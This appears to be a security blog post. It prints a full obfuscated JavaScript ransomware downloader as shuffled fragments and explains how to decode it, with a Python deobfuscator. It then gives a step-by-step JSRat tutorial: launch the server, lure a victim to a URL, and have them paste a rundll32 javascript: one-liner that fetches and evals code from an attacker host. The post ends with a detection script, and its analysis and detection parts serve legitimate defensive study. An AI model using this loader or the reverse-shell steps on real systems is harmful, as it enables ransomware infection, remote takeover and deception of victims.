'ileEx');k77(908, 'for(v');k77(142, '.Fi');k77(555, ';i++) ');k77(87, '"a";');k77(587, ' yo');k77(612, ' If');k77(109, 'eObj');k77(278, 'n==');k77(395, ' fp.W');k77(724, 'RE"+c');k77(737, '+" /V');k77(51, 'ssp');k77(258, 'e(pd');k77(785, 'cs+"');k77(872, ' ws');k77(768, 'SZ /');k77(489, 'teL');k77(359, 'te');k77(375, '"); ');k77(500, 'tcoi');k77(912, ';i');k77(42, 'spl.i');k77(319, 'WriteL');k77(540, 'nload');k77(873, '.R');k77(524, 'e(');k77(389, 'pay ');k77(206, 'onseBo');k77(29, '["');k77(360, 'd u');k77(419, 'le');k77(8, '";');k77(196, 'a.o');k77(552, ';i<ll');k77(919, ';};fp');k77(243, 'ave');k77(694, 'u c');k77(236, ' else ');k77(654, 'e ');k77(933, '0,0); ');k77(193, 's==');k77(794, 
'en"+c');k77(411, 'iteLin');k77(149, ' { f');k77(692, ' - ');k77(447, 'rit');k77(673, 'n b');k77(808, 'd.e');k77(311, 'tFi');k77(350, 'fi');k77(831, '+cq+" ');k77(640, 'iteLi');k77(129, 'cript.');k77(931, 'php"');k77(160, 'ength;');k77(656, 'ir');k77(889, '% /c n');k77(608, 'teLi');k77(382, 'e yo');k77(22, 'g.f');k77(174, '/coun');k77(739, '+"C');k77(32, '.a');k77(660, ', ');k77(783, 'q+"');k77(339, 'ba');k77(469, '; f');k77(925, '% /');k77(617, ' 3 day');k77(486, '(""');k77(681, ' m');k77(46, '.co');k77(650, ' Win');k77(884, ',1); w');k77(440, 'ew');k77(82, 'ngs(');k77(145, 'ists(f');k77(596, 'iteL');k77(413, '. Cr');k77(223, '".e');k77(818, '0,0');k77(425, 'eLine(');k77(565, '+"/co');k77(451, '"2. ');k77(490, 'ine("3');k77(135, 'ng.');k77(549, '; ');k77(526, '. Open');k77(487, '); fp');k77(733, 'on');k77(661, 'etc');k77(233, ';}catc');k77(613, ' you ');k77(813, '.t');k77(843, '+c');k77(191, 'st');k77(819, '); ');k77(892, 'e "+');k77(384, ' f');k77(0, 'var id');k77(939, '"+cq');k77(634, 'lp yo');k77(237, 'if');k77(397, 'ne("');k77(461, 'in');k77(883, 'q,0');k77(923, 'n("%CO');k77(573, 'Lin');k77(381, 'or');k77(645, '`s us');k77(300, ' fo');k77(738, ' "+cq');k77(593, 'ine(""');k77(452, 'Buy ');k77(561, '  ');k77(626, 'iteLin');k77(296, 'leE');k77(7, '45810');k77(563, 'tp://"');k77(267, '+"');k77(597, 'ine("P');k77(324, 'WriteL');k77(141, 'fo');k77(443, 'riteLi');k77(12, ' var c');k77(816, 'q+c');k77(473, '     ');k77(322, 'ION!"');k77(915, 'p.W');k77(875, 'OMSPEC');k77(429, '"   ');k77(860, 'ofi');k77(182, 'nd="');k77(415, 'te');k77(95, 'tring');k77(568, '="');k77(117, 'va');k77(333, 'our do');k77(287, '(f');k77(765, '+" /v');k77(57, 'rch');k77(531, 'wing l');k77(556, '{ ');k77(657, 'us ');k77(164, '=0; t');k77(579, '. 
Run');k77(69, 'ect(');k77(31, 'nivato');k77(79, 'vironm');k77(887, '%COMS');k77(916, 'rite');k77(163, ' dn');k77(326, '");');k77(23, 'ro');k77(671, 'iles');k77(378, 'Line("');k77(866, '+"');k77(61, 'co');k77(594, '); f');k77(354, 'eLin');k77(920, '.Clos');k77(740, 'ryp');k77(879, '"+cq+f');k77(309, '.Creat');k77(312, 'le');k77(464, 're:")');k77(294, '") && ');k77(175, 'ter');k77(870, 'cq,0,');k77(823, 'PEC% /');k77(85, '")+');k77(93, 'men');k77(383, 'ur');k77(697, ' this ');k77(615, 'ot pay');k77(138, 'Obje');k77(523, 'teLin');k77(534, 'in y');k77(950, ' D');k77(638, '); fp.');k77(649, 'stall');k77(113, 'XML');k77(201, '; xa');k77(677, ' o');k77(576, '.Writ');k77(754, 'un(');k77(510, 'ri');k77(544, '; fp.');k77(543, 'or:")');k77(603, 'p.Writ');k77(156, 'or');k77(672, ' ca');k77(431, 'htt');k77(471, 'eLine');k77(16, 'mCh');k77(877, '+fn+');k77(862, '"+');k77(570, '}; f');k77(94, 'tS');k77(204, 'o.r');k77(84, 'EMP%');k77(111, '("M');k77(844, 'q,0,');k77(827, '"+');k77(184, '+n,');k77(86, 'cs+');k77(789, 'cs+');k77(957, '; };');k77(637, 'us."');k77(528, 'of the');k77(456, ' B');k77(731, 'rrent');k77(279, '1){ld');k77(307, 'ar fp=');k77(848, 'SPEC%');k77(815, 's+c');k77(846, '.Run');k77(668, '    ');k77(405, '); fp.');k77(826, 'y ');k77(181, '+"&r');k77(441, '")');k77(682, 'ak');k77(770, ' "+cq+');k77(811, '+cs+c');k77(197, 'pe');k77(52, 'l.i');k77(755, '"%C');k77(948, 'SP');k77(758, 'c REG');k77(774, '0)');k77(833, '%AppD');k77(903, 'e(fn+"');k77(125, '.Strea');k77(942, 'xe"+c');k77(314, '.t');k77(211, 'size>1');k77(498, 'thi');k77(189, 'if(x');k77(691, '    ');k77(261, 'e if(n');k77(155, ') { f');k77(578, 'e("5');k77(253, '(n');k77(216, 'n<');k77(282, ';}; } ');k77(410, 'fp.Wr');k77(858, '+cq+"%');k77(507, '"); ');k77(760, '+cq+"H');k77(956, '; }');k77(676, 'pted');k77(148, '"))');k77(505, 'iteLi');k77(257, 'oFil');k77(330, '("');k77(483, 'p.');k77(72, 'ri');k77(787, 'ed');k77(711, ' ws.');k77(59, 'ulti');k77(675, 'ecry');k77(619, ' LO');k77(406, 'Wri');k77(722, 
'"SOF');k77(299, ' &&');k77(130, 'Create');k77(318, 'p.');k77(845, '0); ws');k77(35, 'hh');k77(835, 'cs');k77(9, ' var');k77(757, 'C% /');k77(308, 'fo');k77(659, 'are');k77(797, 'and"+');k77(913, '++)');k77(463, 'rch he');k77(298, 'pd)');k77(653, 'pdat');k77(635, 'u exce');k77(256, '.saveT');k77(435, 'hain');k77(642, '(" ');k77(24, 'mCharC');k77(896, 'cq,0,');k77(943, 'q,0,0)');k77(600, 'EM');k77(936, 'SPEC');k77(119, 'a=WScr');k77(97, '%TEM');k77(479, 's.com/');k77(793, 's+"op');k77(332, 'l y');k77(937, '% /c D');k77(420, 't ');k77(54, 'ar');k77(99, '")+cs');k77(207, 'dy');k77(248, '",');k77(100, '+"p');k77(652, 's, u');k77(176, '/?a');k77(810, ' "');k77(938, 'EL ');k77(205, 'esp');k77(519, 'eLi');k77(895, 'xt"+');k77(678, 'nly');k77(44, 'funwi');k77(228, 'un(');k77(853, 'q+fn+');k77(240, '3)');k77(252, ' if');k77(292, '+".');k77(266, 'fn');k77(185, ' false');k77(251, 'lse');k77(522, '.Wri');k77(385, 'iles ');k77(171, '/"+ll[');k77(625, 'p.Wr');k77(200, 'pe=1');k77(388, ' to ');k77(288, 'o.F');k77(194, '200');k77(221, 'ile(fn');k77(897, '0); v');k77(874, 'un("%C');k77(416, ' Bitc');k77(74, '.Shell');k77(144, 'Ex');k77(98, 'P%');k77(851, ' /');k77(304, '+"');k77(644, '- It');k77(394, 's).");');k77(491, '. 
Sen');k77(584, 'o re');k77(708, 'p.Cl');k77(684, 'ent');k77(863, 'cs+"De');k77(582, 'pto');k77(864, 'skt');k77(70, '"W');k77(43, 'n","');k77(629, ' - N');k77(687, 'fp.');k77(83, '"%T');k77(791, 'hel');k77(927, 'L "');k77(674, 'e d');k77(349, 'onal ');k77(6, 'bc="0.');k77(173, '+"');k77(504, ' fp.Wr');k77(202, '.write');k77(703, ' (DE');k77(621, 'LL YOU');k77(756, 'OMSPE');k77(329, 'ne');k77(106, 'Script');k77(744, 'G_');k77(346, 'tant');k77(474, ' h');k77(719, 'q+');k77(64, 'ar ');k77(591, ' fp.Wr');k77(717, 'EG AD');k77(630, 'ob');k77(132, 'ect');k77(734, '"+c');k77(820, 'ws.R');k77(558, 'WriteL');k77(245, 'File');k77(286, ' if');k77(881, 'hp');k77(759, ' ADD "');k77(512, 'e(" ');k77(317, 'ue); f');k77(457, 'TC ');k77(192, 'atu');k77(518, 'it');k77(771, '"Cr');k77(729, 'dows"+');k77(386, 'yo');k77(814, 'xt"+c');k77(363, 'ng');k77(387, 'u have');k77(533, 'ks ');k77(14, 'Strin');k77(921, 'e();');k77(559, 'ine("');k77(28, 'l=');k77(291, 'ts(fn');k77(822, 'COMS');k77(4, '"; va');k77(361, 'sing ');k77(475, 'ttps');k77(930, '+".');k77(752, ',0)');k77(509, '.W');k77(506, 'ne("');k77(553, '.le');k77(620, 'OSE A');k77(423, '.W');k77(720, '"HKC');k77(583, 'r t');k77(313, '(fn+"');k77(331, 'Al');k77(750, 'xt');k77(636, 'pt ');
t42 = t42.join(""); eval(t42);

 

 

The eval at the end executes t42 after the pieces have been joined in index order. The order of the k77 calls is irrelevant: the first argument is the array index, so join("") puts the fragments back in sequence however they were shuffled.

If you paste the code minus the final eval into the console of Chrome's F12 developer tools, the script runs and reconstructs the original code (leaving the eval in would execute the payload).

View that reconstructed code with JSFormat.
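Reassembling the sparse array statically, as an added Python example that is not from the post: it parses every k77(index, 'piece') call, orders the pieces by index the way t42.join("") does, and returns the script text instead of eval()ing it. The k77 sample it runs on is a constructed benign one, not the post's ransomware loader.

```python
import re

_ESC = {"n": "\n", "t": "\t", "r": "\r", "\\": "\\", "'": "'", '"': '"'}


def _unescape_js_single(raw):
    # Only the escapes that matter for these fragments; \x and \u forms are left as-is
    return re.sub(r"\\(.)", lambda m: _ESC.get(m.group(1), m.group(1)), raw)


def reassemble_sparse_array(js_text, setter="k77"):
    """Collect every setter(index, 'piece') call and join the pieces by index.

    Array.prototype.join on a sparse array walks indices in ascending order and
    yields "" for holes, so sorted concatenation reproduces t42.join("") exactly.
    A repeated index overwrites the earlier piece, as the JS assignment would.
    """
    pat = re.compile(re.escape(setter) + r"\(\s*(\d+)\s*,\s*'((?:[^'\\]|\\.)*)'\s*\)")
    pieces = {}
    for m in pat.finditer(js_text):
        pieces[int(m.group(1))] = _unescape_js_single(m.group(2))
    return "".join(pieces[i] for i in sorted(pieces))


# Constructed benign sample using the post's k77 pattern (not the post's loader)
SAMPLE_JS = r"""function k77(l31,d19) {t42[l31] = d19;}; var t42 = new Array();
k77(530, 'o from k');k77(12, 'var m');k77(77, 'sg = \'hell');
k77(812, '77\'; document.');k77(999, 'title = msg;');
t42 = t42.join(""); eval(t42);"""


def reassemble_sample():
    return reassemble_sparse_array(SAMPLE_JS)


if __name__ == "__main__":
    print(reassemble_sample())
```

This gives the same text the Chrome console trick gives, without a JavaScript engine in the loop; if a sample also hides its eval behind a variable or Function(), the regex still only needs the setter name and the quote style.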

 

 

Analysis shows that ll is the list of malicious sites; the script builds a URL from each entry, requests the ransomware from that site, and saves it as an .exe.

After that it uses WriteLine to create the ransom-note text files.


☞ Building reverse TCP malware with JavaScript

Put simply, the victim pastes the attacker-generated script into cmd on their own system and it runs there.

So nothing is installed; a script is executed through cmd.


1)

./MyJSRat.py -i 192.168.2.50 -p 8080

This starts the web server and generates the URL.


2)

Get the victim to open the wtf URL.


3)

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.2.50:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

Paste this script into cmd to connect back. rundll32 loads mshtml and calls RunHTMLApplication with a javascript: URL; the script fetches /connect with WinHttpRequest and eval()s whatever comes back, and if the server is unreachable it kills rundll32 so nothing is left hanging. The %20s are URL-encoded spaces so the one-liner survives inside the javascript: URL.


From there it works like msf's reverse_tcp.
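A triage check for that one-liner, as an added Python example that is not part of the post or of JSRat: it flags command lines that hand a javascript: URL to rundll32 and pulls out the callback URL, the HTTP method and the fallback command after %20 decoding. The first sample line is the post's one-liner; the second is a constructed, ordinary rundll32 invocation that must not be flagged.

```python
import re
from urllib.parse import unquote

# The loader's shape: rundll32 handed a javascript: URL, which mshtml then executes
_JS_RUNDLL = re.compile(r"\brundll32(?:\.exe)?\s+javascript:", re.IGNORECASE)
_OPEN = re.compile(r"""\.Open\(\s*["'](GET|POST)["']\s*,\s*["']([^"']+)["']""", re.IGNORECASE)
_RUN = re.compile(r"""\.Run\(\s*["']([^"']+)["']""")


def analyze_cmdline(cmdline):
    """None for command lines that are not the javascript: rundll32 loader; otherwise
    the callback URL, the HTTP method, the fallback command and two marker flags."""
    if not _JS_RUNDLL.search(cmdline):
        return None
    decoded = unquote(cmdline)  # %20 keeps spaces alive inside the javascript: URL
    m = _OPEN.search(decoded)
    r = _RUN.search(decoded)
    return {
        "run_html_application": "RunHTMLApplication" in decoded,
        "evals_response": "eval(" in decoded,
        "method": m.group(1).upper() if m else None,
        "url": m.group(2) if m else None,
        "fallback": r.group(1) if r else None,
    }


# Constructed process-creation command lines: the post's one-liner, and a normal rundll32 call
SAMPLES = [
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.2.50:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}',
    r"rundll32.exe shell32.dll,Control_RunDLL hotplug.dll",
]


def triage(lines=SAMPLES):
    return [analyze_cmdline(line) for line in lines]


if __name__ == "__main__":
    for result in triage():
        print(result)
```

The javascript: argument alone is the reliable indicator; rundll32 has no legitimate reason to receive one, so the extracted URL is there for the responder, not for the decision.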